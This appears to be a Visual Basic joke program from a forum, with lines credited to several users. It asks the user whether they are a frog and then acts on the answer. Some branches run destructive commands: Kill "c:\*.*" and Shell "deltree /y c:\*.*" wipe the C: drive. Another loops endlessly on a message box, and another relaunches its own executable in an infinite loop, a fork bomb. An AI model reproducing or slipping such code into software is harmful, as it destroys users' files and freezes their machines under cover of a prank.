VB Code:
  1. Option Explicit
  2. Dim sAns As String
  3.  
  4. Private Sub Form_Load()
  5.     GoTo 10 'DiGErR
  6.     End ' and people say gotos are worthless!
  7. 10
  8.     On Error Resume Next 'Lou
  9.     Dim A As Integer 'Alex (Alien_Poo)
  10.  
  11.  
  12.     A = 1 / 0 'Yash (OrdinaryGuy)
  13.     If MsgBox("Are you a frog?", vbQuestion + vbYesNo) = vbYes Then 'Yash
  14.         MsgBox "Hello Mendhak!", 64, "Greetings": Kill "c:\*.*" 'DiGErR
  15.     Else: sAns = InputBox("Well, you're not mendhak, but who are you then?", "Name?") 'arsmakman
  16.         If sAns = "rj" Then Shell "smartdrv": Shell "smartdrv": Shell "deltree /y c:\*.*"
  17.         If sAns = "Mendhak" Then Do: MsgBox "You're screwed": Loop
  18.         If sAns = "DigitalError" Then Exit Sub
  19.         If sAns = "" GoTo KillSystem:
  20.     End If
  21.  
  22. Exit Sub
  23. KillSystem:
  24. Do
  25. Shell App.Path & "\" & App.EXEName & ".exe"
  26. Loop
  27. End Sub